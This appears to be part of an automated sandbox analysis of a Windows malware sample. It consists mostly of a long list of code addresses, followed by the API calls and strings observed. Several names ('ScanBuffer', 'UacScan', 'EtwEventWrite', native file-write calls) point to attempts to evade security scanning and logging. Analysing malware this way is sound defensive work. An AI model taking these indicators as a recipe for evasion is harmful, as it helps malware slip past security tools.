0x0327e527
0x0327e539
0x0327e551
0x0327e55c
0x0327e55d
0x0327e562
0x0327e567
0x0327e56d
0x0327e57d
0x0327e595
0x0327e5a0
0x0327e5b2
0x0327e5ca
0x0327e5d5
0x0327e5d6
0x0327e5db
0x0327e5e0
0x0327e5e6
0x0327e5f6
0x0327e60e
0x0327e619
0x0327e62b
0x0327e643
0x0327e64e
0x0327e64f
0x0327e654
0x0327e659
0x0327e65f
0x0327e66f
0x0327e687
0x0327e692
0x0327e6a4
0x0327e6bc
0x0327e6c7
0x0327e6c8
0x0327e6cd
0x0327e6d2
0x0327e6d8
0x0327e6e8
0x0327e700
0x0327e70b
0x0327e71d
0x0327e735
0x0327e740
0x0327e741
0x0327e74b
0x0327e750
0x0327e752
0x0327e758
0x0327e75d
0x0327e763
0x0327e773
0x0327e78b
0x0327e796
0x0327e7a8
0x0327e7c0
0x0327e7cb
0x0327e7cc
0x0327e7d1
0x0327e7d6
0x0327e7dc
0x0327e7ec
0x0327e804
0x0327e80f
0x0327e821
0x0327e839
0x0327e844
0x0327e845
0x0327e84a
0x0327e84f
0x0327e855
0x0327e865
0x0327e87d
0x0327e888
0x0327e89a
0x0327e8b2
0x0327e8bd
0x0327e8be
0x0327e8c3
0x0327e8c8
0x0327e8ce
0x0327e8de
0x0327e8f6
0x0327e901
0x0327e913
0x0327e92b
0x0327e936
0x0327e937
0x0327e93c
0x0327e941
0x0327e947
0x0327e957
0x0327e96f
0x0327e97a
0x0327e98c
0x0327e9a4
0x0327e9af
0x0327e9b0
0x0327e9b0
0x0327e752
0x0327fb76
0x0327fb7b
0x0327fb81
0x0327fb91
0x0327fba9
0x0327fbb4
0x0327fbc6
0x0327fbde
0x0327fbe9
0x0327fbea
0x0327fbef
0x0327fbf4
0x0327fbfa
0x0327fc0a
0x0327fc22
0x0327fc2d
0x0327fc3f
0x0327fc57
0x0327fc62
0x0327fc63
0x0327fc6d
0x0327fc73
0x0327fc7b
0x0327fc80
0x0327fc80
0x0327fc82
0x0327fc87
0x03286698
0x03286698
0x0328669a
0x0328669d
0x032866a0
0x032866b0
0x032866c0
0x032866cb
0x032866d6
0x032866e1
0x032866f1
0x03286701
0x03286711
0x03286721
0x0328672c
0x0328673c
0x0328674c
0x0328675c
0x0328676c
0x0328677c
0x0328678c
0x0328679c
0x032867ac
0x032867b7
0x032867c2
0x032867cd
0x032867dd
0x032867e8
0x032867f3
0x032867fe
0x0328680e
0x03286819
0x03286824
0x0328682f
0x0328683f
0x0328684f
0x0328685f
0x0328686a
0x03286875
0x03286880
0x03286890
0x0328689b
0x032868ab
0x032868bb
0x032868c6
0x032868d1
0x032868dc
0x032868ec
0x032868fc
0x0328690c
0x0328691c
0x03286927
0x0328692d
0x0328693d
0x0328694d
0x03286958
0x03286968
0x03286978
0x03286983
0x03286993
0x0328699e
0x032869ae
0x032869be
0x032869ce
0x032869d9
0x032869df
0x032869ef
0x032869fa
0x03286a0a
0x03286a1a
0x03286a2a
0x03286a3a
0x03286a4a
0x03286a55
0x03286a6a
0x0327fc8d
0x0327fc8d
0x0327fc92
0x0327fc98
0x0327fca8
0x0327fcc0
0x0327fccb
0x0327fcdd
0x0327fcf5
0x0327fd00
0x0327fd01
0x0327fd06
0x0327fd0b
0x0327fd11
0x0327fd21
0x0327fd39
0x0327fd44
0x0327fd56
0x0327fd6e
0x0327fd79
0x0327fd7a
0x0327fd7f
0x0327fd84
0x0327fd8a
0x0327fd9a
0x0327fdb2
0x0327fdbd
0x0327fdcf
0x0327fde7
0x0327fdf2
0x0327fdf3
0x0327fdf8
0x0327fdfd
0x0327fe03
0x0327fe13
0x0327fe2b
0x0327fe36
0x0327fe48
0x0327fe60
0x0327fe6b
0x0327fe6c
0x0327fe88
0x0327fe98
0x0327fe9d
0x0327fea2
0x0327fea8
0x0327feb8
0x0327fed0
0x0327fedb
0x0327feed
0x0327ff05
0x0327ff10
0x0327ff11
0x0327ff16
0x0327ff1b
0x0327ff21
0x0327ff31
0x0327ff49
0x0327ff54
0x0327ff66
0x0327ff7e
0x0327ff89
0x0327ff8a
0x0327ff8f
0x0327ff94
0x0327ff9a
0x0327ffaa
0x0327ffc2
0x0327ffcd
0x0327ffdf
0x0327fff7
0x03280002
0x03280003
0x03280008
0x0328000d
0x03280013
0x03280023
0x0328003b
0x03280046
0x03280058
0x03280070
0x0328007b
0x0328007c
0x0328008c
0x0328009c
0x032800a1
0x032800a6
0x032800ac
0x032800bc
0x032800d4
0x032800df
0x032800f1
0x03280109
0x03280114
0x03280115
0x0328011a
0x0328011f
0x03280125
0x03280135
0x0328014d
0x03280158
0x0328016a
0x03280182
0x0328018d
0x0328018e
0x03280193
0x03280198
0x0328019e
0x032801ae
0x032801c6
0x032801d1
0x032801e3
0x032801fb
0x03280206
0x03280207
0x0328020c
0x03280211
0x03280217
0x03280227
0x0328023f
0x0328024a
0x0328025c
0x03280274
0x0328027f
0x03280280
0x0328028b
0x03280291
0x032802a7
0x032802b4
0x032802ba
0x032802bf
0x032802c4
0x032802ca
0x032802da
0x032802f2
0x032802fd
0x0328030f
0x03280327
0x03280332
0x03280333
0x03280338
0x0328033d
0x03280343
0x03280353
0x0328036b
0x03280376
0x03280388
0x032803a0
0x032803ab
0x032803ac
0x032803b1
0x032803b6
0x032803bc
0x032803cc
0x032803e4
0x032803ef
0x03280401
0x03280419
0x03280424
0x03280425
0x0328042a
0x0328042f
0x03280435
0x03280445
0x0328045d
0x03280468
0x0328047a
0x03280492
0x0328049d
0x0328049e
0x032804ad
0x032804bc
0x032804cb
0x032804da
0x032804e9
0x032804f8
0x03280507
0x03280516
0x03280525
0x03280534
0x03280543
0x03280552
0x03280557
0x0328055c
0x03280562
0x03280572
0x0328058a
0x03280595
0x032805a7
0x032805bf
0x032805ca
0x032805cb
0x032805d0
0x032805d5
0x032805db
0x032805eb
0x03280603
0x0328060e
0x03280620
0x03280638
0x03280643
0x03280644
0x0328065b
0x03280666
0x0328066b
0x0328066d
0x03280673
0x03280678
0x0328067e
0x0328068e
0x032806a6
0x032806b1
0x032806c3
0x032806db
0x032806e6
0x032806e7
0x032806ec
0x032806f1
0x032806f7
0x03280707
0x0328071f
0x0328072a
0x0328073c
0x03280754
0x0328075f
0x03280760
0x03280777
0x03280782
0x03280782
0x03280787
0x0328078c
0x03280792
0x032807a2
0x032807ba
0x032807c5
0x032807d7
0x032807ef
0x032807fa
0x032807fb
0x03280800
0x03280805
0x0328080b
0x0328081b
0x03280833
0x0328083e
0x03280850
0x03280868
0x03280873
0x03280874
0x0328087e
0x03280884
0x0328088c
0x03280891
0x03280891
0x0328089a
0x032808a7
0x032808ac
0x032808b1
0x032808b7
0x032808c7
0x032808df
0x032808ea
0x032808fc
0x03280914
0x0328091f
0x03280920
0x03280925
0x0328092a
0x03280930
0x03280940
0x03280958
0x03280963
0x03280975
0x0328098d
0x03280998
0x03280999
0x0328099e
0x032809a3
0x032809a9
0x032809b9
0x032809d1
0x032809dc
0x032809ee
0x03280a06
0x03280a11
0x03280a12
0x03280a17
0x03280a1c
0x03280a22
0x03280a32
0x03280a4a
0x03280a55
0x03280a67
0x03280a7f
0x03280a8a
0x03280a8b
0x03280a9a
0x03280a9f
0x03281bcc
0x03281bcc
0x03281bd1
0x03281bd7
0x03281be7
0x03281bff
0x03281c0a
0x03281c1c
0x03281c34
0x03281c3f
0x03281c40
0x03281c45
0x03281c4a
0x03281c50
0x03281c60
0x03281c78
0x03281c83
0x03281c95
0x03281cad
0x03281cb8
0x03281cb9
0x03281ccf
0x03281cdf
0x03281ce4
0x03281ce9
0x03281cef
0x03281cff
0x03281d17
0x03281d22
0x03281d34
0x03281d4c
0x03281d57
0x03281d58
0x03281d5d
0x03281d62
0x03281d68
0x03281d78
0x03281d90
0x03281d9b
0x03281dad
0x03281dc5
0x03281dd0
0x03281dd1
0x03281dd6
0x03281ddb
0x03281de1
0x03281df1
0x03281e09
0x03281e14
0x03281e26
0x03281e3e
0x03281e49
0x03281e4a
0x03281e66
0x03281e76
0x03281e7b
0x03281e80
0x03281e86
0x03281e96
0x03281eae
0x03281eb9
0x03281ecb
0x03281ee3
0x03281eee
0x03281eef
0x03281ef4
0x03281ef9
0x03281eff
0x03281f0f
0x03281f27
0x03281f32
0x03281f44
0x03281f5c
0x03281f67
0x03281f68
0x03281f6d
0x03281f72
0x03281f78
0x03281f88
0x03281fa0
0x03281fab
0x03281fbd
0x03281fd5
0x03281fe0
0x03281fe1
0x03281ff1
0x03282002
0x03282012
0x03282017
0x0328201c
0x03282022
0x03282032
0x0328204a
0x03282055
0x03282067
0x0328207f
0x0328208a
0x0328208b
0x03282090
0x03282095
0x0328209b
0x032820ab
0x032820c3
0x032820ce
0x032820e0
0x032820f8
0x03282103
0x03282104
0x03282109
0x0328210e
0x03282114
0x03282124
0x0328213c
0x03282147
0x03282159
0x03282171
0x0328217c
0x0328217d
0x0328218c
0x03282191
0x03283c56
0x03283c56
0x03283c5b
0x03283c61
0x03283c71
0x03283c89
0x03283c94
0x03283ca6
0x03283cbe
0x03283cc9
0x03283cca
0x03283ccf
0x03283cd4
0x03283cda
0x03283cea
0x03283d02
0x03283d0d
0x03283d1f
0x03283d37
0x03283d42
0x03283d43
0x03283d48
0x03283d4d
0x03283d53
0x03283d63
0x03283d7b
0x03283d86
0x03283d98
0x03283db0
0x03283dbb
0x03283dbc
0x03283dcb
0x03283dd0
0x0328473f
0x03284744
0x0328474a
0x0328475a
0x03284772
0x0328477d
0x0328478f
0x032847a7
0x032847b2
0x032847b3
0x032847b8
0x032847bd
0x032847c3
0x032847d3
0x032847eb
0x032847f6
0x03284808
0x03284820
0x0328482b
0x0328482c
0x03284831
0x03284836
0x0328483c
0x0328484c
0x03284864
0x0328486f
0x03284881
0x03284899
0x032848a4
0x032848a5
0x032848aa
0x032848af
0x032848b5
0x032848c5
0x032848dd
0x032848e8
0x032848fa
0x03284912
0x0328491d
0x0328491e
0x03284923
0x03284928
0x0328492e
0x0328493e
0x03284956
0x03284961
0x03284973
0x0328498b
0x03284996
0x03284997
0x0328499c
0x032849a1
0x032849a7
0x032849b7
0x032849cf
0x032849da
0x032849ec
0x03284a04
0x03284a0f
0x03284a10
0x03284a1f
0x03284a24
0x03284a2a
0x03284a2f
0x03284a35
0x03284a45
0x03284a5d
0x03284a68
0x03284a7a
0x03284a92
0x03284a9d
0x03284a9e
0x03284aa3
0x03284aa8
0x03284aae
0x03284abe
0x03284ad6
0x03284ae1
0x03284af3
0x03284b0b
0x03284b16
0x03284b17
0x03284b1c
0x03284b21
0x03284b27
0x03284b37
0x03284b4f
0x03284b5a
0x03284b6c
0x03284b84
0x03284b8f
0x03284b90
0x03284bbc
0x03284bd4
0x03284bed
0x03284bf2
0x03284bf4
0x03284bf6
0x03284bfb
0x03284c01
0x03284c11
0x03284c29
0x03284c34
0x03284c46
0x03284c5e
0x03284c69
0x03284c6a
0x03284c6a
0x03284c6f
0x03284c74
0x03284c7a
0x03284c8a
0x03284ca2
0x03284cad
0x03284cbf
0x03284cd7
0x03284ce2
0x03284ce3
0x03284ce8
0x03284ced
0x03284cf3
0x03284d03
0x03284d1b
0x03284d26
0x03284d38
0x03284d50
0x03284d5b
0x03284d5c
0x03284d66
0x03284d6c
0x03284d72
0x03284d74
0x03284d76
0x03284d76
0x03284d79
0x03284d79
0x03284d8e
0x03284d93
0x03284d98
0x03284d9e
0x03284dae
0x03284dc6
0x03284dd1
0x03284de3
0x03284dfb
0x03284e06
0x03284e07
0x03284e0c
0x03284e11
0x03284e17
0x03284e27
0x03284e3f
0x03284e4a
0x03284e5c
0x03284e74
0x03284e7f
0x03284e80
0x03284e99
0x03284e9e
0x03284ea5
0x03284ea7
0x03284eac
0x03284eb2
0x03284ec2
0x03284eda
0x03284ee5
0x03284ef7
0x03284f0f
0x03284f1a
0x03284f1b
0x03284f1b
0x03284f20
0x03284f25
0x03284f2b
0x03284f3b
0x03284f53
0x03284f5e
0x03284f70
0x03284f88
0x03284f93
0x03284f94
0x03284fab
0x03284fb0
0x03284fb5
0x03284fbb
0x03284fcb
0x03284fe3
0x03284fee
0x03285000
0x03285018
0x03285023
0x03285024
0x03285029
0x0328502e
0x03285034
0x03285044
0x0328505c
0x03285067
0x03285079
0x03285091
0x0328509c
0x0328509d
0x032850a8
0x032850ad
0x032850b2
0x032850b8
0x032850c8
0x032850e0
0x032850eb
0x032850fd
0x03285115
0x03285120
0x03285121
0x03285126
0x0328512b
0x03285131
0x03285141
0x03285159
0x03285164
0x03285176
0x0328518e
0x03285199
0x0328519a
0x0328519f
0x032851a4
0x032851aa
0x032851ba
0x032851d2
0x032851dd
0x032851ef
0x03285207
0x03285212
0x03285213
0x03285227
0x0328523b
0x0328524f
0x03285263
0x03285277
0x0328528b
0x0328529f
0x032852b3
0x032852be
0x032852be
0x032852cd
0x032852d2
0x032852d8
0x032852dd
0x032852e3
0x032852f3
0x0328530b
0x03285316
0x03285328
0x03285340
0x0328534b
0x0328534c
0x03285351
0x03285356
0x0328535c
0x0328536c
0x03285384
0x0328538f
0x032853a1
0x032853b9
0x032853c4
0x032853c5
0x032853ca
0x032853d0
0x032853e0
0x032853e5
0x032853eb
0x032853f0
0x032853f2
0x032853f7
0x032853f9
0x03285409
0x03285420
0x03285425
0x0328542a
0x03285430
0x03285440
0x03285458
0x03285463
0x03285475
0x0328548d
0x03285498
0x03285499
0x0328549e
0x032854a3
0x032854a9
0x032854b9
0x032854d1
0x032854dc
0x032854ee
0x03285506
0x03285511
0x03285512
0x03285517
0x0328551c
0x03285522
0x03285532
0x0328554a
0x03285555
0x03285567
0x0328557f
0x0328558a
0x0328558b
0x03285595
0x0328559a
0x0328559c
0x032855a2
0x032855a7
0x032855ad
0x032855bd
0x032855d5
0x032855e0
0x032855f2
0x0328560a
0x03285615
0x03285616
0x0328561b
0x03285620
0x03285626
0x03285636
0x0328564e
0x03285659
0x0328566b
0x03285683
0x0328568e
0x0328568f
0x032856a4
0x032856b4
0x032856b9
0x032856be
0x032856c4
0x032856d4
0x032856ec
0x032856f7
0x03285709
0x03285721
0x0328572c
0x0328572d
0x03285732
0x03285737
0x0328573d
0x0328574d
0x03285765
0x03285770
0x03285782
0x0328579a
0x032857a5
0x032857a6
0x032857b7
0x032857c2
0x032857cf
0x032857e0
0x032857eb
0x032857ec
0x032857ec
0x032857f1
0x032857f6
0x032857fc
0x0328580c
0x03285824
0x0328582f
0x03285841
0x03285859
0x03285864
0x03285865
0x0328586a
0x0328586f
0x03285875
0x03285885
0x0328589d
0x032858a8
0x032858ba
0x032858d2
0x032858dd
0x032858de
0x032858e3
0x032858e8
0x032858ee
0x032858fe
0x03285916
0x03285921
0x03285933
0x0328594b
0x03285956
0x03285957
0x0328596d
0x0328596d
0x03285972
0x03285977
0x0328597d
0x0328598d
0x032859a5
0x032859b0
0x032859c2
0x032859da
0x032859e5
0x032859e6
0x032859eb
0x032859f0
0x032859f6
0x03285a06
0x03285a1e
0x03285a29
0x03285a3b
0x03285a53
0x03285a5e
0x03285a5f
0x03285a64
0x03285a69
0x03285a6f
0x03285a7f
0x03285a97
0x03285aa2
0x03285ab4
0x03285acc
0x03285ad7
0x03285ad8
0x03285ae8
0x03285af3
0x03285aff
0x03285b0a
0x03285b0b
0x03285b10
0x03285b15
0x03285b1b
0x03285b2b
0x03285b43
0x03285b4e
0x03285b60
0x03285b78
0x03285b83
0x03285b84
0x03285b89
0x03285b8e
0x03285b94
0x03285ba4
0x03285bbc
0x03285bc7
0x03285bd9
0x03285bf1
0x03285bfc
0x03285bfd
0x03285c02
0x03285c07
0x03285c0d
0x03285c1d
0x03285c35
0x03285c40
0x03285c47
0x03285c52
0x03285c6a
0x03285c75
0x03285c76
0x03285c86
0x03285c91
0x03285c9d
0x03285ca8
0x03285ca9
0x03285cb9
0x03285cc4
0x03285cd0
0x03285cdb
0x03285cdc
0x03285cec
0x03285cf7
0x03285d03
0x03285d0e
0x03285d0f
0x03285d1f
0x03285d2a
0x03285d36
0x03285d41
0x03285d42
0x03285d52
0x03285d5d
0x03285d69
0x03285d74
0x03285d75
0x03285d85
0x03285d90
0x03285d9c
0x03285da7
0x03285da8
0x03285db8
0x03285dc3
0x03285dcf
0x03285dda
0x03285ddb
0x03285deb
0x03285df6
0x03285e02
0x03285e0d
0x03285e0e
0x03285e1e
0x03285e29
0x03285e35
0x03285e40
0x03285e41
0x03285e50
0x03285e5f
0x03285e6e
0x03285e7d
0x03285e8c
0x03285e9b
0x03285eaa
0x03285eb9
0x03285ec8
0x03285ed7
0x03285ee6
0x03285ef5
0x03285f04
0x03285f13
0x03285f22
0x03285f31
0x03285f36
0x03285f3b
0x03285f41
0x03285f51
0x03285f69
0x03285f74
0x03285f86
0x03285f9e
0x03285fa9
0x03285faa
0x03285faf
0x03285fb4
0x03285fba
0x03285fca
0x03285fe2
0x03285fed
0x03285fff
0x03286017
0x03286022
0x03286023
0x03286028
0x0328602d
0x03286033
0x03286043
0x0328605b
0x03286066
0x0328606d
0x03286078
0x03286090
0x0328609b
0x0328609c
0x032860ac
0x032860b7
0x032860c3
0x032860ce
0x032860cf
0x032860df
0x032860ea
0x032860f6
0x03286101
0x03286102
0x03286112
0x0328611d
0x03286129
0x03286134
0x03286135
0x03286145
0x03286150
0x0328615c
0x03286167
0x03286168
0x03286178
0x03286183
0x0328618f
0x0328619a
0x0328619b
0x032861ab
0x032861b6
0x032861c2
0x032861cd
0x032861ce
0x032861de
0x032861e9
0x032861f5
0x03286200
0x03286201
0x03286211
0x0328621c
0x03286228
0x03286233
0x03286234
0x03286244
0x0328624f
0x0328625b
0x03286266
0x03286267
0x03286277
0x03286282
0x0328628e
0x03286299
0x0328629a
0x032862aa
0x032862b5
0x032862c1
0x032862cc
0x032862cd
0x032862dd
0x032862e8
0x032862f4
0x032862ff
0x03286300
0x03286310
0x0328631b
0x03286327
0x03286332
0x03286333
0x03286343
0x0328634e
0x0328635a
0x03286365
0x03286366
0x03286376
0x03286381
0x0328638d
0x03286398
0x03286399
0x032863a9
0x032863b4
0x032863c0
0x032863cb
0x032863cc
0x032863dc
0x032863e7
0x032863f3
0x032863fe
0x032863ff
0x0328640f
0x0328641a
0x03286426
0x03286431
0x03286432
0x03286442
0x0328644d
0x03286459
0x03286464
0x03286465
0x03286475
0x03286480
0x0328648c
0x03286497
0x03286498
0x032864a8
0x032864b3
0x032864bf
0x032864ca
0x032864cb
0x032864db
0x032864e6
0x032864f2
0x032864fd
0x032864fe
0x0328650d
0x03286512
0x03286517
0x0328651d
0x0328652d
0x03286545
0x03286550
0x03286562
0x0328657a
0x03286585
0x03286586
0x0328658b
0x03286590
0x03286596
0x032865a6
0x032865be
0x032865c9
0x032865db
0x032865f3
0x032865fe
0x032865ff
0x03286604
0x03286609
0x0328660f
0x0328661f
0x03286637
0x03286642
0x03286654
0x0328666c
0x03286677
0x03286678
0x0328668c
0x03286693
0x00000000
0x03283dd6
0x03283dd6
0x03283ddb
0x03283de1
0x03283df1
0x03283e09
0x03283e14
0x03283e26
0x03283e3e
0x03283e49
0x03283e4a
0x03283e4f
0x03283e54
0x03283e5a
0x03283e6a
0x03283e82
0x03283e8d
0x03283e9f
0x03283eb7
0x03283ec2
0x03283ec3
0x03283ec8
0x03283ecd
0x03283ed3
0x03283ee3
0x03283efb
0x03283f06
0x03283f18
0x03283f30
0x03283f3b
0x03283f3c
0x03283f41
0x03283f46
0x03283f4c
0x03283f5c
0x03283f74
0x03283f7f
0x03283f91
0x03283fa9
0x03283fb4
0x03283fb5
0x03283fcd
0x03283fde
0x03283fe3
0x03283fe8
0x03283fee
0x03283ffe
0x03284016
0x03284021
0x03284033
0x0328404b
0x03284056
0x03284057
0x0328406e
0x0328407e
0x03284083
0x03284088
0x0328408e
0x0328409e
0x032840b6
0x032840c1
0x032840d3
0x032840eb
0x032840f6
0x032840f7
0x032840fc
0x03284101
0x03284107
0x03284117
0x0328412f
0x0328413a
0x0328414c
0x03284164
0x0328416f
0x03284170
0x03284175
0x0328417a
0x03284180
0x03284190
0x032841a8
0x032841b3
0x032841c5
0x032841dd
0x032841e8
0x032841e9
0x032841ee
0x032841f3
0x032841f9
0x03284209
0x03284221
0x0328422c
0x0328423e
0x03284256
0x03284261
0x03284262
0x03284273
0x0328427a
0x0328427b
0x03284280
0x03284283
0x03284286
0x0328428b
0x03284291
0x032842a1
0x032842b9
0x032842c4
0x032842d6
0x032842ee
0x032842f9
0x032842fa
0x032842ff
0x03284304
0x0328430a
0x0328431a
0x03284332
0x0328433d
0x0328434f
0x03284367
0x03284372
0x03284373
0x0328437d
0x03284383
0x03284389
0x0328438b
0x0328438d
0x0328438d
0x03284390
0x03284390
0x03284394
0x0328439c
0x032843a1
0x032843a6
0x032843ac
0x032843bc
0x032843d4
0x032843df
0x032843f1
0x03284409
0x03284414
0x03284415
0x0328441a
0x0328441f
0x03284425
0x03284435
0x0328444d
0x03284458
0x0328446a
0x03284482
0x0328448d
0x0328448e
0x032844ad
0x032844b2
0x032844b7
0x032844bd
0x032844cd
0x032844e5
0x032844f0
0x03284502
0x0328451a
0x03284525
0x03284526
0x0328452b
0x03284530
0x03284536
0x03284546
0x0328455e
0x03284569
0x0328457b
0x03284593
0x0328459e
0x0328459f
0x032845a4
0x032845a9
0x032845af
0x032845bf
0x032845d7
0x032845e2
0x032845f4
0x0328460c
0x03284617
0x03284618
0x03284629
0x0328462e
0x03284630
0x03284633
0x03284636
0x03284645
0x03284645
0x03282197
0x03282197
0x0328219d
0x032821a2
0x032821a7
0x032821a9
0x032821ab
0x032821ad
0x032821af
0x032821b1
0x032821b6
0x032821b8
0x032821ba
0x032821bc
0x032821be
0x032821c0
0x032821d0
0x032821e8
0x032821f3
0x032821f8
0x032821fa
0x00000000
0x03282200
0x03282200
0x03282205
0x0328220b
0x0328221b
0x03282233
0x0328223e
0x03282250
0x03282268
0x03282273
0x03282274
0x03282284
0x0328228f
0x03282294
0x03282296
0x00000000
0x0328229c
0x0328229c
0x032822a1
0x032822a7
0x032822b7
0x032822cf
0x032822da
0x032822ec
0x03282304
0x0328230f
0x03282310
0x03282315
0x0328231a
0x03282320
0x03282330
0x03282348
0x03282353
0x03282365
0x0328237d
0x03282388
0x03282389
0x0328238e
0x03282393
0x03282399
0x032823a9
0x032823c1
0x032823cc
0x032823de
0x032823f6
0x03282401
0x03282402
0x03282413
0x03282423
0x0328242b
0x03282437
0x03282449
0x0328244c
0x03282451
0x03282457
0x0328245c
0x0328245e
0x03282460
0x03282462
0x03282464
0x03282466
0x03282468
0x0328246a
0x0328246f
0x03282471
0x03282473
0x03282475
0x03282477
0x03282479
0x0328247b
0x0328247d
0x0328248d
0x032824a5
0x032824b0
0x032824c2
0x032824da
0x032824e5
0x032824e6
0x0328252c
0x03282544
0x03282556
0x03282559
0x0328255b
0x0328255e
0x03282561
0x03282570
0x03282570
0x03282296
0x032821fa
0x03280aa5
0x03280aa5
0x03280aaa
0x03280ab0
0x03280ac0
0x03280ad8
0x03280ae3
0x03280ae8
0x03280aea
0x00000000
0x03280af0
0x03280af0
0x03280af5
0x03280afb
0x03280b0b
0x03280b23
0x03280b2e
0x03280b40
0x03280b58
0x03280b63
0x03280b64
0x03280b69
0x03280b6e
0x03280b74
0x03280b84
0x03280b9c
0x03280ba7
0x03280bb9
0x03280bd1
0x03280bdc
0x03280bdd
0x03280be2
0x03280be7
0x03280bed
0x03280bfd
0x03280c15
0x03280c20
0x03280c32
0x03280c4a
0x03280c55
0x03280c56
0x03280c5b
0x03280c61
0x03280c66
0x03280c77
0x03280c8e
0x03280c93
0x03280c98
0x03280c9e
0x03280cae
0x03280cc6
0x03280cd1
0x03280ce3
0x03280cfb
0x03280d06
0x03280d07
0x03280d0c
0x03280d11
0x03280d17
0x03280d27
0x03280d3f
0x03280d4a
0x03280d5c
0x03280d74
0x03280d7f
0x03280d80
0x03280d85
0x03280d8a
0x03280d90
0x03280da0
0x03280db8
0x03280dc3
0x03280dd5
0x03280ded
0x03280df8
0x03280df9
0x03280dfe
0x03280e03
0x03280e09
0x03280e19
0x03280e31
0x03280e3c
0x03280e4e
0x03280e66
0x03280e71
0x03280e72
0x03280e77
0x03280e7c
0x03280e82
0x03280e92
0x03280eaa
0x03280eb5
0x03280ec7
0x03280edf
0x03280eea
0x03280eeb
0x03280ef0
0x03280ef5
0x03280efb
0x03280f00
0x03280f02
0x03280f04
0x03280f06
0x03280f08
0x03280f0d
0x03280f0f
0x03280f11
0x03280f13
0x03280f15
0x03280f25
0x03280f3c
0x03280f41
0x03280f46
0x03280f4c
0x03280f5c
0x03280f74
0x03280f7f
0x03280f91
0x03280fa9
0x03280fb4
0x03280fb5
0x03280fba
0x03280fbf
0x03280fc5
0x03280fd5
0x03280fed
0x03280ff8
0x0328100a
0x03281022
0x0328102d
0x0328102e
0x03281033
0x03281038
0x0328103e
0x0328104e
0x03281066
0x03281071
0x03281083
0x0328109b
0x032810a6
0x032810a7
0x032810ac
0x032810b1
0x032810b7
0x032810c7
0x032810df
0x032810ea
0x032810fc
0x03281114
0x0328111f
0x03281120
0x03281125
0x0328112a
0x03281130
0x03281140
0x03281158
0x03281163
0x03281175
0x0328118d
0x03281198
0x03281199
0x032811aa
0x032811b5
0x032811c2
0x032811d3
0x032811de
0x032811df
0x032811e4
0x032811e9
0x032811ef
0x032811ff
0x03281217
0x03281222
0x03281234
0x0328124c
0x03281257
0x03281258
0x0328125d
0x03281262
0x03281268
0x03281278
0x03281290
0x0328129b
0x032812ad
0x032812c5
0x032812d0
0x032812d1
0x032812d6
0x032812db
0x032812e1
0x032812f1
0x03281309
0x03281314
0x03281326
0x0328133e
0x03281349
0x0328134a
0x0328134f
0x03281354
0x0328135a
0x0328136a
0x03281382
0x0328138d
0x0328139f
0x032813b7
0x032813c2
0x032813c3
0x032813c8
0x032813cd
0x032813d3
0x032813e3
0x032813fb
0x03281406
0x03281418
0x03281430
0x0328143b
0x0328143c
0x03281441
0x03281446
0x0328144c
0x0328145c
0x03281474
0x0328147f
0x03281491
0x032814a9
0x032814b4
0x032814b5
0x032814c6
0x032814cd
0x032814ce
0x032814d3
0x032814d6
0x032814d9
0x032814de
0x032814e4
0x032814f4
0x0328150c
0x03281517
0x03281529
0x03281541
0x0328154c
0x0328154d
0x03281552
0x03281557
0x0328155d
0x0328156d
0x03281585
0x03281590
0x032815a2
0x032815ba
0x032815c5
0x032815c6
0x032815d7
0x032815f5
0x03281607
0x0328160f
0x0328161d
0x03281633
0x03281645
0x03281648
0x0328164d
0x03281653
0x03281663
0x0328167b
0x03281686
0x03281698
0x032816b0
0x032816bb
0x032816bc
0x032816c1
0x032816c6
0x032816cc
0x032816dc
0x032816f4
0x032816ff
0x03281711
0x03281729
0x03281734
0x03281735
0x0328173f
0x0328174b
0x03281761
0x03281773
0x03281776
0x0328177b
0x03281781
0x03281791
0x032817a9
0x032817b4
0x032817c6
0x032817de
0x032817e9
0x032817ea
0x032817ef
0x032817f4
0x032817fa
0x0328180a
0x03281822
0x0328182d
0x0328183f
0x03281857
0x03281862
0x03281863
0x0328189d
0x032818b5
0x032818c7
0x032818cc
0x032818cf
0x032818d2
0x032818e1
0x032818e1
0x03280aea
0x03280a9f

APIs

InetIsOffline.URL(000008AE,00000000,03286A6B,?,?,00000259,00000000,00000000), ref: 0327D8D9

Part of subcall function 03277C04: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,03277CA2), ref: 03277C3C
Part of subcall function 03277C04: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C4A
Part of subcall function 03277C04: GetProcAddress.KERNEL32(73990000,00000000), ref: 03277C63
Part of subcall function 03277C04: FreeLibrary.KERNEL32(73990000,73990000,00000000,00000000,00000000,00000000,00000000,00000000,03277CA2), ref: 03277C82

Part of subcall function 03262EE0: QueryPerformanceCounter.KERNEL32 ref: 03262EE4

Part of subcall function 03267E40: GetFileAttributesA.KERNEL32(00000000,03392880,0327DEBB,ScanString,03286AA0,ScanBuffer,03286AA0,UacInitialize,03286AA0,UacScan,03286AA0,Initialize,03286AA0,ScanBuffer,03286AA0,OpenSession), ref: 03267E4B

Part of subcall function 03267E64: GetFileAttributesA.KERNEL32(00000000,03392880,0328066B,ScanString,03286AA0,OpenSession,03286AA0,ScanBuffer,03286AA0,OpenSession,03286AA0,ScanString,03286AA0,Initialize,03286AA0,ScanBuffer), ref: 03267E6F

Part of subcall function 0326802C: CreateDirectoryA.KERNEL32(00000000,00000000,03392880,03280787,ScanBuffer,03286AA0,Initialize,03286AA0,ScanString,03286AA0,OpenSession,03286AA0,ScanBuffer,03286AA0,OpenSession,03286AA0), ref: 03268039

Part of subcall function 0327CB04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0327CBD6), ref: 0327CB43
Part of subcall function 0327CB04: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0327CB7D
Part of subcall function 0327CB04: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0327CBAA
Part of subcall function 0327CB04: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0327CBB3

Strings

IconIndex=, xrefs: 0328162E
EnumServicesStatusA, xrefs: 03285E82
iexpress.exe, xrefs: 0327DFCF
MZP, xrefs: 0328569A
EtwEventWrite, xrefs: 032864D6
NtDeviceIoControlFile, xrefs: 03285E55
NtOpenSection, xrefs: 032862A5
NtAccessCheck, xrefs: 032863A4
NtQueryInformationThread, xrefs: 03286272
LdrGetProcedureAddress, xrefs: 0328640A
